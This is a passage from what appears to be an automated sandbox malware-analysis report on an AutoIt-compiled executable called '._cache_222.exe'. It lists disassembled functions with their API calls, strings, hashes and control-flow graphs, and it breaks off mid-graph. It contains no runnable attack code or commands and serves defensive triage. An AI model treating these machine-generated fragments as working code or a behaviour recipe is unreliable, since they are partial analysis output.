                                                                                                                                        • Opcode Fuzzy Hash: 6a5eca2fc92efd3c2886dbc0346729bbe2d40db420cd0431df192431ad5f5c32
                                                                                                                                        • Instruction Fuzzy Hash: FC022775600601DFCB14EF28C899E2AB7E5EF89720F04855DF99A9B362DB38ED01CB41
                                                                                                                                        Function 00764257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,00000000,00000001,00000000), ref: 0076428C
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 00781BC7: __wcsicmp_l.LIBCMT ref: 00781C50
                                                                                                                                        • _wcscpy.LIBCMT ref: 007643C0
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 007D214E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_222.exe$CMDLINE$CMDLINERAW
                                                                                                                                        • API String ID: 861526374-4250834258
                                                                                                                                        • Opcode ID: 5cd7b8015a7329aedb69f96ecc372b6758214d39d04a99ef5c006d7d322487f6
                                                                                                                                        • Instruction ID: ae34bec0ad07791360ade45e8620079a14cfac5967dbd84c3e39d4f6646b9caa
                                                                                                                                        • Opcode Fuzzy Hash: 5cd7b8015a7329aedb69f96ecc372b6758214d39d04a99ef5c006d7d322487f6
                                                                                                                                        • Instruction Fuzzy Hash: C8819372800159EACB15EBE0CC5AEEF7B78FF14350F600016E942B7182EF786A45CBA1
                                                                                                                                        Function 0077E975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0077EA39
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0077EA56
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcsncat.LIBCMT ref: 0077EA69
                                                                                                                                        • __makepath.LIBCMT ref: 0077EA85
                                                                                                                                          • Part of subcall function 00782BFF: __wmakepath_s.LIBCMT ref: 00782C13
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • _wcscpy.LIBCMT ref: 0077EABE
                                                                                                                                          • Part of subcall function 0077EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0077EADA,?,?), ref: 0077EB27
                                                                                                                                        • _wcscat.LIBCMT ref: 007D32FC
                                                                                                                                        • _wcscat.LIBCMT ref: 007D3334
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007D3370
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                        • String ID: '/z$Include$\
                                                                                                                                        • API String ID: 1213536620-3682632366
                                                                                                                                        • Opcode ID: 61886e6f41ef557f65141e6ce6f4bee60ab72998c1ddf1892078883b2c7d5fbf
                                                                                                                                        • Instruction ID: 835a5b6c1b2cbbd90fb8f516c49dd7b91fce42c5a34b87ee74c65013390c72b1
                                                                                                                                        • Opcode Fuzzy Hash: 61886e6f41ef557f65141e6ce6f4bee60ab72998c1ddf1892078883b2c7d5fbf
                                                                                                                                        • Instruction Fuzzy Hash: 97514EB1404340EFC325EF55EC89C9AB7E8FB48310F80852EF54597361EB789A4ACB66
                                                                                                                                        Function 007A78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1143 7a78ee-7a7911 WSAStartup 1144 7a79b1-7a79bd call 781943 1143->1144 1145 7a7917-7a7938 gethostname gethostbyname 1143->1145 1153 7a79be-7a79c1 1144->1153 1145->1144 1147 7a793a-7a7941 1145->1147 1149 7a794e-7a7950 1147->1149 1150 7a7943 1147->1150 1151 7a7952-7a795f call 781943 1149->1151 1152 7a7961-7a79a6 call 77faa0 inet_ntoa call 783220 call 7a8553 call 781943 call 78017e 1149->1152 1154 7a7945-7a794c 1150->1154 1159 7a79a9-7a79af WSACleanup 1151->1159 1152->1159 1154->1149 1154->1154 1159->1153
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                                        • Opcode ID: e8473a02e5f7ce413f74966e9062af72155c87b42e17c557167b3de56b8a376d
                                                                                                                                        • Instruction ID: 2fc8ba281658876358dce6f8e2b45a40aeb1fe6e79057ad6c511608e7a196f73
                                                                                                                                        • Opcode Fuzzy Hash: e8473a02e5f7ce413f74966e9062af72155c87b42e17c557167b3de56b8a376d
                                                                                                                                        • Instruction Fuzzy Hash: 2211A571908115AFDB38A7709C4AEEA776CEF86720F004166F45996091EF78EE81C7A4
                                                                                                                                        Function 007630A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007630B0
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007630BF
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 007630D5
                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 007630E7
                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 007630F9
                                                                                                                                          • Part of subcall function 0076318A: LoadImageW.USER32(00760000,00000063,00000001,00000010,00000010,00000000), ref: 007631AE
                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00763167
                                                                                                                                          • Part of subcall function 00762F58: GetSysColorBrush.USER32(0000000F), ref: 00762F8B
                                                                                                                                          • Part of subcall function 00762F58: RegisterClassExW.USER32(00000030), ref: 00762FB5
                                                                                                                                          • Part of subcall function 00762F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762FC6
                                                                                                                                          • Part of subcall function 00762F58: LoadIconW.USER32(000000A9), ref: 00763009
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                        • API String ID: 2880975755-4155596026
                                                                                                                                        • Opcode ID: 2f26c88c7d2bc3fc1bba2e47ce303010d6d0234521d33c639eef1c1a8c8bfe8e
                                                                                                                                        • Instruction ID: 756a1d31b960861a15ef371e15bb4a5dca664a86afe40b7506a6c82256bfbb64
                                                                                                                                        • Opcode Fuzzy Hash: 2f26c88c7d2bc3fc1bba2e47ce303010d6d0234521d33c639eef1c1a8c8bfe8e
                                                                                                                                        • Instruction Fuzzy Hash: F52133B0E00748ABCF20DFA5EC4DA99BFF5FB58314F10C12AE614A62A0D7754A518F95
                                                                                                                                        Function 007BB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1342 7bb74b-7bb7ac VariantInit call 76ca8e CoInitialize 1345 7bb7ae CoUninitialize 1342->1345 1346 7bb7b4-7bb7c7 call 77d5f6 1342->1346 1345->1346 1349 7bb7c9-7bb7d0 call 76ca8e 1346->1349 1350 7bb7d5-7bb7dc 1346->1350 1349->1350 1351 7bb81b-7bb85b call 7684a6 call 77f885 1350->1351 1352 7bb7de-7bb805 call 7684a6 call 79a857 1350->1352 1363 7bb9d3-7bba17 SetErrorMode CoGetInstanceFromFile 1351->1363 1364 7bb861-7bb86e 1351->1364 1352->1351 1362 7bb807-7bb816 call 7bc235 1352->1362 1380 7bbad0-7bbae3 VariantClear 1362->1380 1365 7bba19-7bba1d 1363->1365 1366 7bba1f-7bba3a CoGetObject 1363->1366 1368 7bb8a8-7bb8b6 GetRunningObjectTable 1364->1368 1369 7bb870-7bb881 call 77d5f6 1364->1369 1370 7bba40-7bba47 SetErrorMode 1365->1370 1371 7bba3c 1366->1371 1372 7bbab5-7bbac5 call 7bc235 SetErrorMode 1366->1372 1374 7bb8b8-7bb8c9 1368->1374 1375 7bb8d5-7bb8e8 call 7bc235 1368->1375 1383 7bb883-7bb88d call 76cdb4 1369->1383 1384 7bb8a0 1369->1384 1379 7bba4b-7bba51 1370->1379 1371->1370 1389 7bbac7-7bbacb call 765cd3 1372->1389 1393 7bb8cb-7bb8d0 1374->1393 1394 7bb8ed-7bb8fc 1374->1394 1375->1389 1386 7bbaa8-7bbaab 1379->1386 1387 7bba53-7bba55 1379->1387 1383->1384 1401 7bb88f-7bb89e call 76cdb4 1383->1401 1384->1368 1386->1372 1391 7bba8d-7bbaa6 call 7aa6f6 1387->1391 1392 7bba57-7bba78 call 79ac4b 1387->1392 1389->1380 1391->1389 1392->1391 1404 7bba7a-7bba83 1392->1404 1393->1375 1400 7bb907-7bb91b 1394->1400 1407 7bb9bb-7bb9d1 1400->1407 1408 7bb921-7bb925 1400->1408 1401->1368 1404->1391 1407->1379 1408->1407 1410 7bb92b-7bb940 1408->1410 1414 7bb9a2-7bb9ac 1410->1414 1415 7bb942-7bb957 1410->1415 1414->1400 1415->1414 1418 7bb959-7bb983 call 79ac4b 1415->1418 1422 7bb985-7bb98d 1418->1422 1423 7bb994-7bb99e 1418->1423 1424 7bb98f-7bb990 1422->1424 1425 7bb9b1-7bb9b6 1422->1425 1423->1414 1424->1423 1425->1407
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB777
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007BB7A4
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BB7AE
                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 007BB8AE
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 007BB9DB
                                                                                                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 007BBA0F
                                                                                                                                        • CoGetObject.OLE32(?,00000000,007ED91C,?), ref: 007BBA32
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 007BBA45
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007BBAC5
                                                                                                                                        • VariantClear.OLEAUT32(007ED91C), ref: 007BBAD5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                        • Opcode ID: e3e652fa8b4c898e00011211030e1d726bdffb4c0035efe61ee02b1cc76866dc
                                                                                                                                        • Instruction ID: 0c7d6c3bb1974f6e469caca8629650f00fa1b2f7f08d3e9c8219d133ad9030bb
                                                                                                                                        • Opcode Fuzzy Hash: e3e652fa8b4c898e00011211030e1d726bdffb4c0035efe61ee02b1cc76866dc
                                                                                                                                        • Instruction Fuzzy Hash: 2AC11571604345EFC710DF68C884AAAB7E9FF89314F00491DF98A9B251DB75ED05CB92
                                                                                                                                        Function 00762F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00762F8B
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00762FB5
                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762FC6
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00763009
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 975902462-1005189915
                                                                                                                                        • Opcode ID: 1389e997851a3e397f759cc7e29c022de1284fc88a08f5a714f4d4d80e4c6fca
                                                                                                                                        • Instruction ID: 3d0063198af1776df0d681979f0642ccc61722ca9906ba0448314266299b4370
                                                                                                                                        • Opcode Fuzzy Hash: 1389e997851a3e397f759cc7e29c022de1284fc88a08f5a714f4d4d80e4c6fca
                                                                                                                                        • Instruction Fuzzy Hash: 3221E4B5901348AFDF209F94E889BCDBBB4FB18700F10812AF615AA2A0D7B40545CF95
                                                                                                                                        Function 007C23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1431 7c23c5-7c2426 call 781970 1434 7c2428-7c243b call 76cdb4 1431->1434 1435 7c2452-7c2456 1431->1435 1443 7c243d-7c2450 call 76cdb4 1434->1443 1444 7c2488 1434->1444 1437 7c249d-7c24a3 1435->1437 1438 7c2458-7c2468 call 76cdb4 1435->1438 1440 7c24b8-7c24be 1437->1440 1441 7c24a5-7c24a8 1437->1441 1453 7c246b-7c2484 call 76cdb4 1438->1453 1446 7c24c8-7c24e2 call 7684a6 call 763bcf 1440->1446 1447 7c24c0 1440->1447 1445 7c24ab-7c24b0 call 76cdb4 1441->1445 1443->1453 1449 7c248b-7c248f 1444->1449 1445->1440 1464 7c24e8-7c2541 call 7684a6 call 763bcf call 7684a6 call 763bcf call 7684a6 call 763bcf 1446->1464 1465 7c25a1-7c25a9 1446->1465 1447->1446 1454 7c2499-7c249b 1449->1454 1455 7c2491-7c2497 1449->1455 1453->1437 1463 7c2486 1453->1463 1454->1437 1454->1440 1455->1445 1463->1449 1513 7c256f-7c259f GetSystemDirectoryW call 78010a GetSystemDirectoryW 1464->1513 1514 7c2543-7c255e call 7684a6 call 763bcf 1464->1514 1467 7c25ab-7c25c6 call 7684a6 call 763bcf 1465->1467 1468 7c25d3-7c2601 GetCurrentDirectoryW call 78010a GetCurrentDirectoryW 1465->1468 1467->1468 1484 7c25c8-7c25d1 call 7818fb 1467->1484 1476 7c2605 1468->1476 1479 7c2609-7c260d 1476->1479 1482 7c263e-7c264e call 7a9a8f 1479->1482 1483 7c260f-7c2639 call 76ca8e * 3 1479->1483 1493 7c26aa 1482->1493 1494 7c2650-7c269b call 7aa17a call 7aa073 call 7aa102 1482->1494 1483->1482 1484->1468 1484->1482 1498 7c26ac-7c26bb 1493->1498 1494->1498 1527 7c269d-7c26a8 1494->1527 1502 7c274c-7c2768 CreateProcessW 1498->1502 1503 7c26c1-7c26f1 call 79bc90 call 7818fb 1498->1503 1506 7c276b-7c277e call 78017e * 2 1502->1506 1528 7c26fa-7c270a call 7818fb 1503->1528 1529 7c26f3-7c26f8 1503->1529 1532 7c27bd-7c27c9 CloseHandle 1506->1532 1533 7c2780-7c27b8 call 7ad7e4 GetLastError call 767ba9 call 772570 1506->1533 1513->1476 1514->1513 1535 7c2560-7c2569 call 7818fb 1514->1535 1527->1498 1539 7c270c-7c2711 1528->1539 1540 7c2713-7c2723 call 7818fb 1528->1540 1529->1528 1529->1529 1537 7c27cb-7c27f0 call 7a9d09 call 7aa37f call 7c2881 1532->1537 1538 7c27f5-7c27f9 1532->1538 1548 7c283e-7c284f call 7a9b29 1533->1548 1535->1479 1535->1513 1537->1538 1542 7c27fb-7c2805 1538->1542 1543 7c2807-7c2811 1538->1543 1539->1539 1539->1540 1559 7c272c-7c274a call 78017e * 3 1540->1559 1560 7c2725-7c272a 1540->1560 1542->1548 1549 7c2819-7c2838 call 772570 CloseHandle 1543->1549 1550 7c2813 1543->1550 1549->1548 1550->1549 1559->1506 1560->1559 1560->1560
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C23E6
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C2579
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C259D
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C25DD
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C25FF
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C2760
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007C2792
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C27C1
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C2838
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4090791747-0
                                                                                                                                        • Opcode ID: 835159bb75f39c864238c1c4bf402252477afc9be51c8f6d26457aa0084333fb
                                                                                                                                        • Instruction ID: cd228b3a3097aff5ec94d5e2121cdbb63273a4ffaa1ac7bf3fb65e0a4a2509c6
                                                                                                                                        • Opcode Fuzzy Hash: 835159bb75f39c864238c1c4bf402252477afc9be51c8f6d26457aa0084333fb
                                                                                                                                        • Instruction Fuzzy Hash: EED1E031604341DFCB15EF24C895F6ABBE5AF85320F14845DF98A9B2A2DB38DC42CB52
                                                                                                                                        Function 007BC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1572 7bc8b7-7bc8f1 1573 7bccfb-7bccff 1572->1573 1574 7bc8f7-7bc8fa 1572->1574 1576 7bcd04-7bcd05 1573->1576 1574->1573 1575 7bc900-7bc903 1574->1575 1575->1573 1577 7bc909-7bc912 call 7bcff8 1575->1577 1578 7bcd06 call 7bc235 1576->1578 1583 7bc925-7bc92e call 7abe14 1577->1583 1584 7bc914-7bc920 1577->1584 1582 7bcd0b-7bcd0f 1578->1582 1587 7bcc61-7bcc6c call 76d2c0 1583->1587 1588 7bc934-7bc93a 1583->1588 1584->1578 1596 7bcca9-7bccb4 call 76d2c0 1587->1596 1597 7bcc6e-7bcc72 1587->1597 1589 7bc93c-7bc93e 1588->1589 1590 7bc940 1588->1590 1592 7bc942-7bc94a 1589->1592 1590->1592 1594 7bccec-7bccf4 1592->1594 1595 7bc950-7bc967 call 79abf3 1592->1595 1594->1573 1607 7bc969-7bc96e 1595->1607 1608 7bc973-7bc97f 1595->1608 1596->1594 1606 7bccb6-7bccba 1596->1606 1600 7bcc78 1597->1600 1601 7bcc74-7bcc76 1597->1601 1602 7bcc7a-7bcc98 call 77d6b4 call 7a97b6 1600->1602 1601->1602 1624 7bcc99-7bcca7 call 7ad7e4 1602->1624 1612 7bccbc-7bccbe 1606->1612 1613 7bccc0 1606->1613 1607->1576 1609 7bc9ce-7bc9f9 call 77fa89 1608->1609 1610 7bc981-7bc98d 1608->1610 1625 7bc9fb-7bca16 call 77ac65 1609->1625 1626 7bca18-7bca1a 1609->1626 1610->1609 1614 7bc98f-7bc99c call 79a8c8 1610->1614 1617 7bccc2-7bccea call 77d6b4 call 7a503c call 772570 1612->1617 1613->1617 1623 7bc9a1-7bc9a6 1614->1623 1617->1624 1623->1609 1629 7bc9a8-7bc9af 1623->1629 1624->1582 1627 7bca1d-7bca24 1625->1627 1626->1627 1632 7bca52-7bca59 1627->1632 1633 7bca26-7bca30 1627->1633 1635 7bc9be-7bc9c5 1629->1635 1636 7bc9b1-7bc9b8 1629->1636 1642 7bcadf-7bcaec 1632->1642 1643 7bca5f-7bca66 1632->1643 1639 7bca32-7bca48 call 79a25b 1633->1639 1635->1609 1644 7bc9c7 1635->1644 1636->1635 1641 7bc9ba 1636->1641 1654 7bca4a-7bca50 1639->1654 1641->1635 1645 7bcafb-7bcb28 VariantInit call 781970 1642->1645 1646 7bcaee-7bcaf8 1642->1646 1643->1642 1649 7bca68-7bca7b 1643->1649 1644->1609 1658 7bcb2a-7bcb2b 1645->1658 1659 7bcb2d-7bcb30 1645->1659 1646->1645 1652 7bca7c-7bca84 1649->1652 1655 7bcad1-7bcada 1652->1655 1656 7bca86-7bcaa3 VariantClear 1652->1656 1654->1632 1655->1652 1657 7bcadc 1655->1657 1660 7bcabc-7bcacc 1656->1660 1661 7bcaa5-7bcab9 SysAllocString 1656->1661 1657->1642 1662 7bcb31-7bcb43 1658->1662 1659->1662 1660->1655 1663 7bcace 1660->1663 1661->1660 1664 7bcb47-7bcb4c 1662->1664 1663->1655 1665 7bcb8a-7bcb8c 1664->1665 1666 7bcb4e-7bcb52 1664->1666 1669 7bcb8e-7bcb95 1665->1669 1670 7bcbb4-7bcbd5 call 7ad7e4 call 7aa6f6 1665->1670 1667 7bcba1-7bcba5 1666->1667 